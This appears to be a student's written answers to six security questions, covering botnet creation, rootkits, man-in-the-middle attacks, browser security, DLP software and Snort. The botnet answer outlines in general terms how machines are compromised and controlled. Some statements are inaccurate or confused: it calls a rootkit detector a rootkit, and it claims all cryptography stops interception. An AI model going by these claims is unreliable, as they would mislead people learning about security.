Creating a botnet


Professor’s Name:



Question 1

Creating a botnet begins with the building of a collection of bots. Bots refer to a computer code that is neutral and can be programmed to carry out specific tasks. This collection of bots is then linked through a given network that is then operated from a central point by a botmaster. However, machines that are typically used within a botnet are usually unwilling participants, and as such, a key step in the formation of a botnet is usually the malicious takeover of these computers through concerted attacks, web based malware, automated code exploits and at times even through the use of botnet attacks. A remote control center for the botnets, which allows the botmaster to provide orders and leverage the computing power of bots within the botnet, must then be set up. The mode of control can be achieved through the use of web servers, covert communication channels, IRC channels or peer to peer networks. Finally, after the establishment of the botnet, it would be quite important to clearly outline the purpose of the botnet, as this would allow for objectivity in the usage of the botnet. In most cases, botnets are used for illegal activities, and therefore, programming aimed at achieving the identified targets must be initiated from the command center, be it DDos attacks, spam, keylogging and the spreading of malware amongst others.

Question 2

A Rootkit is essentially a malicious and stealthy type of software that is mostly used to hide the existence of particular programs or processes from the view of a computer user and allow it to escape detection. By escaping detection by the regular screens carried out, the program or process is able to continue its privileged access to a particular computer. As such, a rootkit can hide a wide variety of software such as botnets, file servers and remailers amongst others, allowing for the intruder to launch attacks and take advantage of any vulnerability at will. Seeing as detection may be a tall order, the best approach to dealing with rootkits would be prevention using a defense-in-depth strategy that incorporates anti virus scanners, strong password strategies, firewalls and regular software updates. However, there are a number of software that can be used to identify rootkits, either behavior based or signature based. A good example of such a rootkit is the rootkit revealer, which is a behavior based rootkit detector. Further, following detection, the best approach would be to format and reinstall fresh software, as determining the exact compromised files may prove very difficult.

Question 3

In cases where there is the use of an unencrypted network, an intruder can very easily insert themselves into a private conversation and impersonate each individual within a private exchange. Therefore sending and receiving messages on behalf of the two conversant. In particular, this is most likely to occur when the intruder has achieved close proximity and there is no need for mutual authentication, or the intruder is in a position to override and abuse any such existing system. All cryptographic systems usually provide protection against man in the middle attacks, and this is the main reason why operating using an unsecured network may prove very risky and vulnerable. Creating a stronger mutual authentication system, carry forward verification, testing of certificates and public key infrastructure amongst others, are measures through which one can safeguard against intruders or man in the middle attacks.

Question 4

Browser security refers to the application of internet security to web browsers to provide protection to data, computer systems and networks from all types of malware or breaches of privacy. Browser security highly depends on proper use of Javascript especially those with cross-site scripting. In other cases, it also requires proper use of adobe flash to protect from taking advantage of the vulnerability of some web browsers such as Mozilla firefox, google chrome and Microsoft internet explorer. There are several types of breaches on web browsers that require protection through proper security. The most common are operating system breach and malware in reading, operating system running on background process, hacking of main browsers, hacking of browser components, browser plugins and interception of browser network. To counter this browser breaches, there are several security measures that can be taken the first being monitoring plugins and browser extensions. Although these are not part of the browser they provide valid support to the browsers and they are highly attacked by insecure malwares, therefore blocking any insecure plugins and warning users is necessary. In addition, browser hardening is important providing browser security. It system hardens the browser via security sandboxing features that mainly assist browser user account.

Question 5

Data Loss/leak Prevention software (DLP) provides a system designed to detect any data breach and provide solution by monitoring, detecting and blocking sensitive data while in use used or at rest. The software is mostly used during instances of data leakage where sensitive data is disclosed to unauthorized persons either through malicious actions or genuine mistake. DLP software is commonly used by individuals and organizations to protect company information, financial information, intellectual property and credit data. There are three main categories of data loss prevention process: Standard security measures, Advanced security measures and Designated DLP solutions. Standard security measures are commonly measures taken to protect data from outsiders and insider attacks. The most common of these is the firewalls that assist in detecting intrusion and limiting the number of outside users at a time. Advanced security measures are implemented using machine learning and temporal reasoning. They are commonly used when abnormal data access is detected to stop software activities and intentions of any commands from unauthorized persons. Designated DLP solutions are considered to be advanced security solutions and are used to protect sensitive data. They are more efficient since they use mechanisms such as fingerprinting, data matching, expression matching and keywords. Moreover, are several types of DLP systems that assist in protecting data, the classification is based on the protection process embraced and data type. These types include: Network DLP, Endpoint DLP, File-level DLP, Data identification, data leakage detection and data at rest.

Question 6

Snort refers to an open source network intrusions prevention and detection system (NIDS). The system is currently being developed by Sourcefire to be used in the management of real-time traffic, packet logging on protocol networks. Snort has been embraced by many institutions in the analysis of protocol, content searches and content matching. In the recent past the system started being used to detect attacks and probes. It is quite effective even for detecting fingerprinting systems, blocking server message probes, buffer overflows and unauthorized interface gateways. Even for a small company like 40pcs the Snort system can be essential and should be embraced. Not only because of its incredible protection functions, but also because it is one of the commercial defense providers that can produce signatures fastest from known attacks. Therefore, even though snort may require a little extra time in installing and usage, it is one of the most responsive processes in network protection.